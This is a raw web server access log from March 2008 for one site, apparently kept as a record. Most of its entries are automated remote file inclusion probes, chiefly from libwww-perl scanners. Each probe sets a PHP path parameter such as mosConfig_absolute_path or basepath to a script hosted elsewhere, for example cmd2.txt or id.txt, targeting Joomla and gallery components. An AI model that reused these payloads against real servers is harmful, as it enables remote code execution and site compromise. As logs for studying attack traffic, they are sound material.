82.99.30.71 - - [09/Mar/2008:17:35:24 -0700] "GET /?D=D HTTP/1.0" 200 903 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.toulouseangloexchange.com"
199.239.230.34 - - [09/Mar/2008:17:35:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
199.239.230.34 - - [09/Mar/2008:17:35:34 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
199.72.199.24 - - [09/Mar/2008:17:36:34 -0700] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path[docroot]=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
137.82.197.16 - - [09/Mar/2008:17:37:24 -0700] "GET /index.php?visualizar=http://www.fansvictorvaldes.es//images/data/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
84.40.17.23 - - [09/Mar/2008:17:38:03 -0700] "GET /logs/access_080211.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.fansvictorvaldes.es//images/data/alb.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.40.17.23 - - [09/Mar/2008:17:38:03 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.fansvictorvaldes.es//images/data/alb.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
201.101.0.155 - - [09/Mar/2008:17:38:50 -0700] "GET /logs/%3Cwbr%20/%3Eaccess.log/admin.php?cal_dir=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
77.221.130.16 - - [09/Mar/2008:17:38:51 -0700] "GET /logs/access_080128.log/index.php?visualizar=http://www.fansvictorvaldes.es//images/data/alba.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.16 - - [09/Mar/2008:17:38:51 -0700] "GET /logs/index.php?visualizar=http://www.fansvictorvaldes.es//images/data/alba.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.16 - - [09/Mar/2008:17:38:52 -0700] "GET /logs/access_080204.log/index.php?visualizar=http://www.fansvictorvaldes.es//images/data/alba.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.99.2.85 - - [09/Mar/2008:17:38:57 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
87.101.95.197 - - [09/Mar/2008:17:39:32 -0700] "GET /logs/access_080127.log//appserv/errors.php?error=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.101.95.197 - - [09/Mar/2008:17:39:32 -0700] "GET /logs//appserv/errors.php?error=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.51.232.116 - - [09/Mar/2008:17:39:54 -0700] "GET /logs/access.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.51.232.116 - - [09/Mar/2008:17:39:55 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.51.232.116 - - [09/Mar/2008:17:39:56 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.39 - - [09/Mar/2008:17:40:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.39 - - [09/Mar/2008:17:40:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.39 - - [09/Mar/2008:17:40:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.232.68.39 - - [09/Mar/2008:17:40:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.101.95.197 - - [09/Mar/2008:17:40:39 -0700] "GET /logs/access_071126.log//appserv/errors.php?error=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:40:40 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:40:40 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:40:40 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:40:40 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:40:40 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:40:40 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:41:07 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:41:07 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:42:06 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:42:06 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
84.40.17.23 - - [09/Mar/2008:17:42:11 -0700] "GET /logs/access_080128.log/index.php?visualizar=http://www.fansvictorvaldes.es//images/data/alb.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.40.17.23 - - [09/Mar/2008:17:42:11 -0700] "GET /logs/index.php?visualizar=http://www.fansvictorvaldes.es//images/data/alb.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:42:41 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:42:42 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.40.17.23 - - [09/Mar/2008:17:42:53 -0700] "GET /logs/access_080204.log/index.php?visualizar=http://www.fansvictorvaldes.es//images/data/alb.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:43:00 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:43:01 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.195.58.165 - - [09/Mar/2008:17:46:01 -0700] "GET /logs/access_080211.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
137.82.197.16 - - [09/Mar/2008:17:46:27 -0700] "GET /logs/access_080128.log/index.php?visualizar=http://www.fansvictorvaldes.es//images/data/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
137.82.197.16 - - [09/Mar/2008:17:46:28 -0700] "GET /logs/index.php?visualizar=http://www.fansvictorvaldes.es//images/data/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
137.82.197.16 - - [09/Mar/2008:17:46:29 -0700] "GET /logs/access_080204.log/index.php?visualizar=http://www.fansvictorvaldes.es//images/data/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:46:38 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:46:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:46:39 -0700] "GET /logs/%3Cwbr%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:46:39 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:46:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:46:39 -0700] "GET /logs/%3Cwbr%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:46:39 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:46:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:46:39 -0700] "GET /logs/%3Cwbr%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.40.17.23 - - [09/Mar/2008:17:47:18 -0700] "GET /logs/access_080128.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.fansvictorvaldes.es//images/data/alb.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
116.125.113.115 - - [09/Mar/2008:17:47:54 -0700] "GET /logs/access_080127.log//appserv/errors.php?error=http://h1.ripway.com/Deddi/IndoIrc/soket.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [09/Mar/2008:17:47:55 -0700] "GET /logs//appserv/errors.php?error=http://h1.ripway.com/Deddi/IndoIrc/soket.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:47:58 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:47:58 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:17:47:58 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
116.125.113.115 - - [09/Mar/2008:17:49:00 -0700] "GET /logs/access_071126.log//appserv/errors.php?error=http://h1.ripway.com/Deddi/IndoIrc/soket.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:49:00 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:49:00 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:17:49:12 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:17:49:12 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:17:49:13 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
199.239.230.34 - - [09/Mar/2008:17:49:15 -0700] "GET /logs/access_080204.log/modules/My_eGallery/index.php?basepath=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
199.239.230.34 - - [09/Mar/2008:17:49:15 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
199.239.230.34 - - [09/Mar/2008:17:49:15 -0700] "GET /logs/access_080204.log/modules/My_eGallery/index.php?basepath=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
199.239.230.34 - - [09/Mar/2008:17:49:16 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
199.239.230.34 - - [09/Mar/2008:17:50:30 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
199.239.230.34 - - [09/Mar/2008:17:50:37 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
82.99.30.7 - - [09/Mar/2008:17:54:04 -0700] "GET /logs/?N=D HTTP/1.0" 200 4211 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.toulouseangloexchange.com"
210.17.23.201 - - [09/Mar/2008:17:56:35 -0700] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
210.17.23.201 - - [09/Mar/2008:17:56:36 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
210.17.23.201 - - [09/Mar/2008:17:57:30 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:57:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:57:34 -0700] "GET //skin/zero_vote/error.php?dir=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:17:57:36 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:57:45 -0700] "GET //?mosConfig_absolute_path=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 200 919 "-" "Avant Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:57:45 -0700] "GET /logs//?mosConfig_absolute_path=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 200 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:58:01 -0700] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:58:06 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:58:09 -0700] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:58:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:58:10 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:58:12 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:58:48 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:17:58:48 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:59:20 -0700] "GET /logs/access_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:17:59:40 -0700] "GET /logs/access_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
71.205.109.188 - - [09/Mar/2008:17:59:44 -0700] "GET /logs/access_071112.log HTTP/1.1" 200 227130 "-" "ewaodufg9uvxx9d9bkewqvawgl" "www.toulouseangloexchange.com"
82.99.30.10 - - [09/Mar/2008:18:01:44 -0700] "GET /logs/?M=A HTTP/1.0" 200 4211 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:03:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.187.13.26 - - [09/Mar/2008:18:03:59 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.102.0.104 - - [09/Mar/2008:18:04:27 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.toulouseangloexchange.com"
212.102.0.104 - - [09/Mar/2008:18:04:27 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:18:07:07 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.36.193.74 - - [09/Mar/2008:18:07:26 -0700] "GET /logs/access_080127.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
72.36.193.74 - - [09/Mar/2008:18:07:26 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
72.36.193.74 - - [09/Mar/2008:18:07:26 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
